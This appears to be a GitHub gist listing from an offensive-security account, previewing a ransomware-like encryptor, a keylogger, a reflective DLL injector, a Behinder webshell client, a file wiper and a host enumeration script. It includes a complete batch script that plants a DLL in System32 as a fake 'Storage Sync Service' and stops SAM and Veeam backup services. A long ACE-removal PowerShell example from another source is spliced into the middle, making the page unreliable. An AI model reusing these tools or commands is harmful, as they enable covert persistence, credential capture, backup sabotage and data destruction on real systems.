
2XXE (SRA) 2XXE-SRA

@2XXE-SRA
2XXE-SRA / coldencryptor.cs
Last active December 27, 2023 15:30
PoC ransomware-like script: generates files, then encrypts them
using System;
using System.IO;
using System.Linq;
using System.Security.Cryptography;
using System.Collections.Generic;
using System.Runtime.InteropServices;
using System.Threading.Tasks;
using Microsoft.Win32;
public class Crypto
2XXE-SRA / enum.sh
Created August 16, 2022 20:19
linux enum.sh
#!/bin/bash
# Quick Linux host enumeration: storage, network, processes, sessions, services, packages.
df -aH                                            # all filesystems, human-readable sizes
ip addr                                           # interfaces and addresses
netstat -tulpn                                    # listening TCP/UDP sockets with owning PIDs (use `ss -tulpn` where netstat is absent)
ps aux                                            # all processes; BSD syntax (`ps -aux` triggers a warning on procps)
who -a                                            # logged-in users and login history
systemctl list-units --type=service --no-pager    # systemd service units
service --status-all                              # SysV-style service status
apt list --installed                              # installed packages (Debian/Ubuntu only)
2XXE-SRA / dockerssm.py
Created August 4, 2022 19:17
Docker daemon via SSM session port forward
import json
import docker
import os
import boto3
import subprocess
TARGET_INSTANCE = "<instance ID>"
LOCAL_PORT = "9999"
REGION = "us-east-1"
PROFILE = "default"
2XXE-SRA / removeace.ps1
Last active June 29, 2022 19:51
Example removal of an ACE via PowerShell ADSI
# get SID for the "Everyone" principal from its well-known SID (avoids the localized name)
$sid = [Security.Principal.SecurityIdentifier]::new([System.Security.Principal.WellKnownSidType]::WorldSid, $null)
$everyone = $sid.Translate([Security.Principal.NTAccount])
# the permission to remove is the User-Change-Password control access right, an extended right
$adRight=[DirectoryServices.ActiveDirectoryRights]"ExtendedRight"
$pguid = New-Object GUID "ab721a53-1e2f-11d0-9819-00aa0040529b" # User-Change-Password; refer to https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/1522b774-6464-41a3-87a5-1e5633c3fbbb
# craft an ACE identical to the one being removed: "Everyone" "Allow" for changing user password.
# RemoveAccessRule only matches an ACE that is identical to the supplied rule, so it is rebuilt here rather than searched for.
$accessRuleArgs = $everyone,$adRight,"Allow",$pguid,"None"
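The preview above ends once the rule arguments are assembled. The following is an added worked example, not code from the gist, that carries the same ADSI pattern through to completion: the ACE is rebuilt to match the existing one exactly, its presence is checked, it is removed, and the change is committed. The function name, the distinguished name in the usage line and the requirement that the caller hold WRITE_DAC on the target object are assumptions, not from the page.

```powershell
# Added example, not part of removeace.ps1. Removes an explicit "Allow" ACE granting
# Everyone the User-Change-Password extended right from one AD object via ADSI.
# Assumptions: the DN used in the usage line is hypothetical; the caller holds
# WRITE_DAC on the target object.
function Remove-EveryoneChangePasswordAce {
    param(
        [Parameter(Mandatory)] [string]$TargetDn   # e.g. "CN=jdoe,OU=Users,DC=example,DC=com" (hypothetical)
    )

    # Resolve "Everyone" from its well-known SID rather than by (localizable) name
    $sid      = [System.Security.Principal.SecurityIdentifier]::new(
                    [System.Security.Principal.WellKnownSidType]::WorldSid, $null)
    $everyone = $sid.Translate([System.Security.Principal.NTAccount])

    $adRight  = [System.DirectoryServices.ActiveDirectoryRights]::ExtendedRight
    $changePw = [Guid]"ab721a53-1e2f-11d0-9819-00aa0040529b"   # User-Change-Password (MS-ADTS control access right)

    # Rebuild the ACE exactly as it exists on the object: RemoveAccessRule matches on
    # identity, rights, Allow/Deny, object GUID and inheritance, not on a loose search.
    $rule = [System.DirectoryServices.ActiveDirectoryAccessRule]::new(
        $everyone, $adRight,
        [System.Security.AccessControl.AccessControlType]::Allow,
        $changePw,
        [System.DirectoryServices.ActiveDirectorySecurityInheritance]::None)

    $entry = [ADSI]"LDAP://$TargetDn"
    $acl   = $entry.psbase.ObjectSecurity

    # Only explicit (non-inherited) ACEs can be removed here; an inherited one has to
    # be removed at the parent or blocked by protecting this object's DACL.
    $present = @($acl.Access | Where-Object {
        -not $_.IsInherited -and
        $_.IdentityReference -eq $everyone -and
        ($_.ActiveDirectoryRights -band $adRight) -and
        $_.ObjectType -eq $changePw -and
        $_.AccessControlType -eq [System.Security.AccessControl.AccessControlType]::Allow
    })
    if ($present.Count -eq 0) {
        Write-Verbose "No explicit Everyone/User-Change-Password Allow ACE on $TargetDn"
        return $false
    }

    if (-not $acl.RemoveAccessRule($rule)) {
        throw "RemoveAccessRule matched no ACE on $TargetDn (check the inheritance flags of the existing ACE)"
    }

    # Write the modified security descriptor back; nothing changes until CommitChanges
    $entry.psbase.ObjectSecurity = $acl
    $entry.psbase.CommitChanges()
    return $true
}

# Usage (hypothetical DN):
# Remove-EveryoneChangePasswordAce -TargetDn "CN=jdoe,OU=Users,DC=example,DC=com" -Verbose
```

If the existing ACE was written with a different inheritance setting (for example "All" or "Descendents"), the rebuilt rule will not match and RemoveAccessRule returns $false; read the flags off `$acl.Access` first and build the rule with the same ActiveDirectorySecurityInheritance value.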
2XXE-SRA / keylog.cs
Created June 14, 2022 20:22
Local Collection resources
using System;
using System.Diagnostics;
using System.Windows.Forms;
using System.Runtime.InteropServices;
using System.IO;
class InterceptKeys
{
private const int WH_KEYBOARD_LL = 13;
private const int WM_KEYDOWN = 0x0100;
2XXE-SRA / inject.cpp
Last active May 5, 2022 15:14
Reflective DLL injection; the payload DLL is carried in the injector's resource section
//modified from: https://www.ired.team/offensive-security/code-injection-process-injection/reflective-dll-injection
#include <iostream>
#include <windows.h>
#include "resource.h"
typedef struct BASE_RELOCATION_BLOCK {
DWORD PageAddress;
DWORD BlockSize;
} BASE_RELOCATION_BLOCK, * PBASE_RELOCATION_BLOCK;
@echo off
REM Drops a DLL from the script's own directory into System32 and stops backup and SQL
REM components before the service named below is (re)created.
set "WORK_DIR=C:\Windows\System32"
set "DLL_NAME=storesyncsvc.dll"
set "SERVICE_NAME=StorSyncSvc"
set "DISPLAY_NAME=Storage Sync Service"
set "DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships with multiple storage accounts via multiple sync groups. If this service is stopped or disabled, applications will be unable to run collectly."
REM remove any previous instance of the service
sc stop %SERVICE_NAME%
sc delete %SERVICE_NAME%
mkdir %WORK_DIR%
copy "%~dp0%DLL_NAME%" "%WORK_DIR%" /Y
REM stop the SAM service (samss) and the Veeam backup services, issued through both net1 and net.exe
net1 stop samss /y
net1 stop veeamcatalogsvc /y
net1 stop veeamcloudsvc /y
net1 stop veeamdeploysvc /y
net.exe stop samss /y
net.exe stop veeamcatalogsvc /y
net.exe stop veeamcloudsvc /y
net.exe stop veeamdeploysvc /y
REM force-kill the SQL Server Browser and CEIP telemetry processes
taskkill.exe /IM sqlbrowser.exe /F
taskkill.exe /IM sqlceip.exe /F
2XXE-SRA / php_cmd.py
Last active March 17, 2022 18:09
Behinder webshell clients
# Behinder Webshell Clients
## php_cmd.py
Minimal client for the Behinder PHP webshell (shell.php). Requires Cmd.php from the official client jar.
2XXE-SRA / README.md
Last active February 1, 2022 19:07
File wiper (and other resources) based on DEV-0586 (MSTIC)

Usage

.\wipe <directory>

Rewrites every file under <directory>, recursing into subdirectories.